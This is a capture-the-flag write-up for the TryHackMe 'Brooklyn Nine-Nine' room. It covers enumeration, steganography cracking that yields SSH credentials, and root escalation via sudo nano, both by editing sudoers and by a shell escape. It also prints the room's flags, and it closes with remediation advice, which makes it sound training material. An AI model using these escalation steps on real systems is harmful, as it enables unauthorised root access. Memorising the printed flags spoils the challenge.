TryHackMe - Brooklyn Nine-Nine CTF Write-up

This is a beginner-friendly CTF challenge themed around the Brooklyn Nine-Nine TV series. The objective is to find the user and root flags through enumeration, steganography, and privilege escalation. Difficulty: Easy Room Link: https://tryhackme.com/room/brooklynninenine

CTF

Leadhand

1/28/20262 min read

Reconnaissance

Initial Nmap Scan

First, we need to enumerate the target machine to identify open ports and running services:

nmap -sC -sV -oN nmap_initial.txt <TARGET_IP>

Expected open ports:

  • Port 21 - FTP (vsftpd)

  • Port 22 - SSH (OpenSSH)

  • Port 80 - HTTP (Apache)

Web Enumeration

Visiting the web server on port 80 reveals a Brooklyn Nine-Nine themed page with an image (brooklyn99.jpg).

Steganography Analysis

Extracting Hidden Data

The image file brooklyn99.jpg on the website contains hidden data. We can use stegseek to crack the steganography password using the rockyou wordlist:

stegseek brooklyn99.jpg /usr/share/wordlists/rockyou.txt

Result: Stegseek successfully extracts a hidden file revealing SSH credentials.

Extract the Hidden File

Once we have the password from stegseek, we can extract the embedded data:

steghide extract -sf brooklyn99.jpg

This reveals a text file containing:

  • Username: holt

  • Password: [password found in extracted file]

Initial Access - SSH as Holt

Login via SSH

Using the credentials discovered from steganography:

ssh holt@<TARGET_IP>

Password: [extracted password]

User Flag

Once logged in as user holt, we can grab the user flag:

ls cat user.txt

User Flag: ee11cbb19052e40b07aac0ca060c23ee

Privilege Escalation

Enumeration as Holt

Check bash history for interesting commands:

cat .bash_history

Findings:

  • su - jake - indicates another user named jake on the system

  • User attempted to switch to jake's account

Check Sudo Permissions

The most critical enumeration step - checking what sudo privileges the current user has:

sudo -l

Output:

User holt may run the following commands on brookly_nine_nine: (ALL) NOPASSWD: /bin/nano

Critical Finding: User holt can run /bin/nano as root without a password!

Root Exploitation

Method 1: Editing /etc/sudoers (Shown in Your Approach)

You can edit the sudoers file to grant yourself full sudo privileges:

sudo /bin/nano /etc/sudoers

Add or modify a line to give yourself full sudo access:

holt ALL=(ALL) NOPASSWD: ALL

Save and exit nano, then you can run any command as root.

Method 2: GTFOBins - Nano Shell Escape (Recommended)

A cleaner approach uses nano's built-in command execution feature:

  1. Open any file with sudo privileges:

sudo /bin/nano /etc/profile

  1. Inside nano, press the following key combination:

    • Ctrl + R (Read File)

    • Ctrl + X (Execute Command)

  2. Enter the command:

!/bin/sh

  1. Press Enter

Result: This spawns a root shell!

Verify Root Access

whoami # Output: root id # Output: uid=0(root) gid=0(root) groups=0(root)

Root Flag

Navigate to the root directory and capture the flag:

cd /root ls cat root.txt

Root Flag: 63a9f0ea7bb98050796b649e85481845

Summary

Attack Chain

  1. Reconnaissance - Identified HTTP service with an image file

  2. Steganography - Used stegseek to crack password-protected hidden data in brooklyn99.jpg

  3. Initial Access - Extracted SSH credentials for user holt

  4. Privilege Escalation - Exploited sudo permissions on /bin/nano to gain root shell

  5. Flags Captured - Retrieved both user and root flags

Key Techniques

  • Steganography analysis using stegseek/steghide

  • Sudo privilege enumeration with sudo -l

  • GTFOBins exploitation - nano shell escape

  • Alternative method - Direct sudoers file modification

Tools Used

  • stegseek - Steganography password cracking

  • steghide - Steganography extraction

  • ssh - Remote access

  • nano - Text editor (exploited for privesc)

  • GTFOBins reference for privilege escalation techniques

Lessons Learned

  1. Always check images and media files for steganography

  2. sudo -l should be one of the first enumeration steps after gaining initial access

  3. Many text editors (nano, vim, less, more) can be exploited for privilege escalation when run with sudo

  4. GTFOBins (https://gtfobins.github.io/) is an essential resource for Unix binary exploitation

Remediation

For Blue Team / Defenders:

  1. Steganography: Monitor and scan uploaded images for hidden data

  2. Sudo Privileges: Never grant sudo access to text editors or programs that allow command execution

  3. Principle of Least Privilege: Users should only have sudo access to specific commands they absolutely need

  4. Regular Audits: Review /etc/sudoers and sudo policies regularly

Challenge Completed! 🎉

This was a great beginner-level CTF that introduces fundamental concepts like steganography, SSH access, and sudo-based privilege escalation.

Stay secure. Stay informed. Stay ahead

info@lnsentinel.com

© 2025. All rights reserved.